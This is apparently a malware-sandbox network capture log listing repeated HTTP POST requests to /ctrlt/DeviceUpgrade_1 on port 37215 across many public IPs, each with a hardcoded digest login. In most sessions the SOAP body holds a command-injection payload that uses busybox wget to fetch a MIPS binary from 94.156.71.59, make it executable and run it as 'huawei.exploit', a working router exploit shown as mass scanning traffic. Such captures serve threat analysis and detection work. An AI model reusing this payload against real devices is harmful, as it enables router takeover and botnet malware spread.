                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            871192.168.2.1338466197.29.159.13437215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.871464968 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            872192.168.2.1333202156.136.99.17237215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.872395992 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            873192.168.2.1355624197.190.134.3537215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.873305082 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            874192.168.2.1360666197.65.234.6637215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.874285936 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            875192.168.2.1345636197.94.37.13337215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.875171900 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            876192.168.2.1347002197.80.176.11837215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.876051903 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            877192.168.2.1354630197.158.23.4937215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.877069950 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            878192.168.2.1359264197.15.80.13637215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.878022909 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            879192.168.2.135805041.150.80.14237215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.879110098 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            880192.168.2.1339822197.213.44.11137215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.905258894 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
